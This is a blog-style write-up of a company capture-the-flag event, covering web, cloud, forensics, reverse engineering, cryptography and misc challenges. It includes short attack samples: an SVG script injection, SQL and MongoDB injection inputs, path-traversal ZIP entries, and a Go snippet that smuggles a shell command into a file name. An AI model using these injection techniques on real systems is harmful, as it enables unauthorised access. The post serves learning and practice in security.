Our first ever CTF was challenging fun

by & about Security in Technology

During the last two days we participated in our first ever security CTF, and it was awesome.

This week at Red Hat we had something quite unique: a company-wide security capture the flag game, and we thoroughly enjoyed it. Two days of puzzle solving, hacking into systems, and all kinds of shenanigans around that topic. The end goal in each challenge was to find a string, a “flag”, which had to be submitted in the CTF system for points.

As we went into it, we didn’t know what to expect. Neither of us has ever done anything like it. Our only experience in security was on the defensive side as software developers. Sure, we knew the common things like SQL injection, XSS, etc. but beyond that? Would it be buffer overflows? Reverse engineering a binary? We had no clue.

Spoiler alert!
This post contains spoilers for the Red Hat PS 20th Anniversary CTF. If you are still solving the challenges after the deadline, please stop reading.

Web application security ▲ Back to top

The minute the start was announced, we headed to the CTF system. As expected, it presented us with a list of challenges. With the both of us having a web background, we threw ourselves at the web application security section first with very few ideas of how the rest (cryptography, reverse engineering, digial forensics, etc) would work.

On the web application security, we were presented with a 1998-style website where we had to uncover three vulnerabilities. The website had several features:

  • Change the SVG background of a DIV on the website
  • A chat interface, which was read-only because we were not logged in
  • A music player

XSS ▲ Back to top

The first we looked at was the SVG stuff. When uploading an SVG, the SVG would then be embedded into the HTML source code of the website:

<div>
    <svg>
        <!-- Here comes more uploaded content -->
    </svg>
</div>

To anyone who has done web application development this screams cross-site scripting. XSS is an injection-type vulnerability, where you can inject JavaScript into a website. So we constructed an SVG file with the following content:

<svg>
    <script>alert("Hello world"!)</script>
</svg>

Sure enough, it worked. The challenge was actually written in such a way that it detected the XSS attempt and presented the flag as a result. (There were a few more steps involved, which we won’t spoil here, in case you are still solving the challenges.)

NoSQL injection ▲ Back to top

Next up was the chat interface. It sent an API call to a PHP file with the following parameters:

{
  "username": null,
  "channel": "public"
}

It also contained a hint that the public channel was only selected because there is no username set. This told us that there are more channels, and that the security for accessing these channels was most likely done on the client side. We tried a few channel names, and usernames, to no avail.

Then we started looking into SQL injection. The typical:

{
  "username": null,
  "channel": "\" OR 1=1 --"
}

No dice, it didn’t work. We kept poking for quite a while, until we then ran an API query against the chat API which was supposed to send a message into the chat. We got a MongoDB error. So the database wasn’t a SQL database at all, it was MongoDB!

A quick google for “MongoDB injection” actually presented the result right on the first result.

Since the website was PHP (you could tell from the URL), we were able to exploit the weird nature of parameter handling in PHP. If you write something.php?username[foo]=bar the username field will not be a string in PHP, it will be an array.

Since MongoDB accepts arrays for queries, we were then able to inject a query that said select all messages where the channel is not public. Tada, there’s our second flag.

URL manipulation / unsafe inclusion ▲ Back to top

The next challenge we understood in theory, but weren’t able to actually solve.

When clicking on the song selector on the website, the URL changed to /?tune=tune1.php. This told us the authors had, of course intentionally, committed what many in the PHP space do in their first days of programming: unsafe inclusion of files. The source code would look roughly like this:

<audio src="<?php
include $_GET["tune"];
echo($tune);
?>">

If you manipulate the tune parameter to point to a different file, the page loads that file instead of the intended tine*.php. This can be used to run unintended code. In the ancient PHP days you were even able to pass a URL in the parameter to load the code from a remote server. (This has been disabled by default and is now being removed entirely.)

Unfortunately, despite finding the correct MP3 file on the server, we were not able to find the correct PHP file to execute for the challenge. The authors of the challenge have also put in some safeguards to make sure only the intended files could be executed.

Cloud security ▲ Back to top

The cloud security section revolved around containers and registries. As we have both worked with containers extensively and Janos wrote a guide on the topic, this was fairly simple.

The first challenge involved downloading a container image, then extracting a file from the image.

The second challenge was a bit trickier: we had to find the flag in a container registry. This involved finding a container image with the flag embedded in the name. Thankfully, the registry API has a way to list container images by accessing /v2/_catalog. We initially thought we had to pull the image, but no, the flag was actually the container name itself.

The third challenge was again the same as the first, but we had to extract the secret from a file that has been deleted from the container image. Do a docker image save, inspect the layers, and there was the flag.

Digital forensics ▲ Back to top

Having sorted out the easier challenges, we started digging into the parts that were a bit more foreign to us. The first of many: digital forensics.

This section had two challenges. The first involved a memory dump from a Linux system, which had the flag buried in the memory of a process. The second involved finding GPS coordinates in an image file.

Let’s address the second one first. One would think that this is trivial: read the EXIF metadata and there are the coordinates. Right? Yes, except there was no EXIF metadata. As it turned out, the RDF metadata was hidden in the picture itself. We found a tool that can extract hidden data, which managed to do the task. Prior to that, we have tried the usual strings, identify, and various other command line approaches as well as changing colors and thresholds and looking at the metadata presented in GIMP.

The other challenge was about analyzing a Linux memory dump. After doing a bit of googling, we found that this is accomplished with a tool called Volatility. Setting it up was a bit of a hassle, but it proved worthwhile. This tool brought a wealth of things we could look at in the memory dump: process list, open files, extracting memory-mapped files, and even extracting Firefox history thanks to a community plugin.

There, the process list showed us that the system was a desktop Linux and had Firefox, kate, and emacs running. We suspected that the flag was hidden in the memory space of one of these processes. Unfortunately, we had to install an extra tool called Yara and the python-yara library in order to dump memory. This took some fiddling around, and we had to patch the Volatility source code slightly as described in this comment. Once we did, we made short work of the memory dump. Search for CTF and sure enough, we got the memory region with the flag.

Reverse engineering ▲ Back to top

Next up on our list was reverse engineering: we were given binaries and needed to provide the application with the correct input to get to the flag.

In retrospect, the first challenge was quite easy as the flag was stored in the data segments of the application, so it could have been extracted with the strings utility. However, we didn’t realize this and went straight at it with gdb. This took some getting used to. Several hours, in fact, as we have never used gdb before. Since the binaries didn’t have debug symbols compiled in we couldn’t extract the original source code and had to resort to reading the ASM code. The experience gathered while writing the 512-byte VM definitely came in handy.

Having to look at ASM code, we realized the following two GDB commands would be most helpful:

tui enable
layout asm

This made GDB much friendlier:

A screenshot of GDB with the text UI enabled, showing several lines of Assembler code

Next up, set a break point on the main function:

b *main

Then run the program:

run

It stopped immediately at our first break point. We could advance step by step with the si instruction.

We went through the program until we reached one of the je or jne instructions. These instructions jump (or don’t jump) based on a check before. If the check fails, the program continues. If it succeeds, the program jumps to a new memory address. For each jump we made notes of the next instruction address, as well as the jump target address. Since we had the wrong input, the program would obviously go the “wrong way”, so whenever a jump happened / didn’t happen, we overrode it by using the j command in gdb to go to the right place and keep running down that path. That way we were able to get the point in the application where it printed the correct flag with the first two challenges.

The third, however, eluded us as the algorithm was just too complex for us to debug through. Instead, we resorted to installing IDA Free from Hex Rays. We knew from several YouTube videos that this tool is widely used for reverse engineering.

Loading up the program, we were presented with this screen:

An interface showing several execution paths in the code, as well as the assembler code.

This interface already chunks up the code into easly readable execution paths. We could also add notes, rename variables, and so on. However, the really big deal was hitting F5, which presented us with extracted C-like pseudocode for the application.

Here we had to make a few educated guesses about the data type of each variable. IDA would present us with the contents of the working memory as the program ran. We were then able to look at the algorithm that verified our input.

We were able to extract the data baked into the binary, and translate the C-like pseudocode into Go to execute it on the data. Here is the example, with the variables already named in IDA:

__int64 __fastcall is_boss_here2(
  char *input,
  char (*flagData1)[32],
  char (*flagData2)[32])
{
  char tmp[24]; // [rsp+18h] [rbp-30h] BYREF
  int useless1; // [rsp+30h] [rbp-18h]
  char useless2; // [rsp+34h] [rbp-14h]
  char v7; // [rsp+3Fh] [rbp-9h]
  int cnt; // [rsp+40h] [rbp-8h]
  int i; // [rsp+44h] [rbp-4h]

  v7 = 1;
  cnt = 1;
  memset(tmp, 0, sizeof(tmp));
  useless1 = 0;
  useless2 = 0;
  for ( i = 0; i <= 28; ++i )
    tmp[i] ^= (*flagData2)[i];
  for ( i = 0; i <= 27; ++i )
  {
    if ( cnt == 8 )
      cnt = 1;
    if (
      (*flagData1)[i + 1] + cnt !=
      (char)(input[i] ^ tmp[i]) )
    {
      v7 = 0;
      return 0LL;
    }
    ++cnt;
  }
  return (unsigned int)v7;
}
func main() {
  tmp := []byte{
    0x00, 0x00, //...
  }
  flagData := []byte{
    0x2E, 0x4F, //...
  }

  var cnt byte = 1
  for i := 0; i < 28; i++ {
    if cnt == 8 {
      cnt = 1
    }
    char := (flagData[i + 1] + cnt) ^ tmp[i]
    fmt.Printf("%s", []byte{char})
    cnt++
  }
}

And that was our third reverse engineering flag done!

Cryptography ▲ Back to top

The cryptography section definitely presented us with a few challenges. The two required applying a sequence of hex, base64 and base32 decoding of a string to reach the flag. This was fiddly, but ultimately didn’t take us too much time.

The third one, however, required us to open up IDA once more. Again, hitting the decompiler, we ended up with the pseudocode. However, this time around it wasn’t as straight forward as previously. The program constructed the flag from the input. This meant that we had to supply the correct input to receive the correct output. There was no way to simply print the correct flag from memory contents.

The application was built in two parts: the first part did a set of bit manipulations on the input. The second part created an SHA1 hash from the bit-manipulated input and verified it against the hash stored in the binary.

This was good: we didn’t actually have to crack the SHA1, but we could use it to verify if our input was correct.

As mentioned, the first part of the input was a series of bit manipulations. Critically though, these involved the length of the input as a parameter. As the length changed, the output would change. However, only for bytes 3-4-5 and so on.

We had one more advantage: we knew that the flags each started with a fixed set of characters. This allowed us to construct a reverse algorithm in Go and then run it for the first few bytes. This was enough to extract the correct input, which then gave us the flag.

The hardest of all: misc ▲ Back to top

Last but not least, there was the misc category. One challenge involved a web interface which verified the password using JavaScript. This one was tricky, because it used the weird type correction in JavaScript. We used the browser console to reverse the algorithm and construct the flag. (We actually found a bug in this challenge and reported it.)

The next one was quite tricky: it contained an audio file with clicks in it. The text gave us a hint which open source tool to use, and we managed to extract the data.

The third, however, was definitely the hardest of all the challenges we managed to solve. Here we had a web interface, where we could upload a firmware to a supposed system. We then had to SSH into the system and run the update command. The web interface offered the current firmware for download.

We fairly quickly figured out that the firmware was a ZIP file, and it needed to contain two files: firmware.bin.enc and firmware.secret.enc. These were GPG encrypted, and we didn’t have the private nor the public key, so we could neither decrypt nor encrypt any data.

We soon figured out that we could use gpg --store to create a GPG-compatible file that would not be encrypted, but correctly decrypted when run through gpg --decrypt. However, that got us nowhere.

We thought for quite a while that we needed to put extra files in the ZIP that would then overwrite system files, but that was not the case. Using Golang again, we created a ZIP archiver which would create specially crafted paths like ../../../app/config.cfg, but that didn’t work either.

Finally, we realized that this was all about command injection when we took a deep look at whatever the console gave us. In this case, the image name they used started with cmd-inj- which we simply took as a hint, even though it possibly wasn’t meant to be one. The interface would GPG decrypt the files, so if the filenames contained shell commands those might be executed. Using our Go program from before, we added a few lines:

if strings.HasSuffix(relPath, "payload.enc") {
    relPath = fmt.Sprintf("; add-injected-command-here ; %s", relPath)
}

There we go, we were able to run commands. We listed the process list, dumped directory contents, but we were not able to get out of the current directory. Turns out, the CLI we were in blacklisted the / character. No problem, just use cd .. a few times, and we were in the root directory, dumping the config of the application itself. We were even able to write to some directories we shouldn’t have been able to, which we reported. (This is a fabulous use case for ContainerSSH, cough hint cough.) We were also able to extract the GPG key, which let us decode the original firmware.

The decrypted firmware contained a hint to the location of the flag. However, we’d have to use ./programname to execute it, which wouldn’t work due to the filtering. However, that was no problem. We set the PATH from a base64-encoded payload to the correct directory and that was our flag extracted.

The ones we didn’t solve ▲ Back to top

There were several challenges that we didn’t have time for. There was a fairly interesting middleware system with web services (WSDL), a shopping cart system that had a crypto algorithm that would have needed to be reverse engineered, a cryptocurrency challenge, and an access control challenge. Too bad we didn’t get to solve these as the previous challenges already ate away all our time.

Conclusion ▲ Back to top

This CTF was an extreme amount of fun, and we learned more in two days than in months previously. The challenges were really well made, even if some of them seemed a bit artificial. From almost 200 teams we won second place. We are very thankful we had the opportunity to participate. 1010/1010 - would do it again.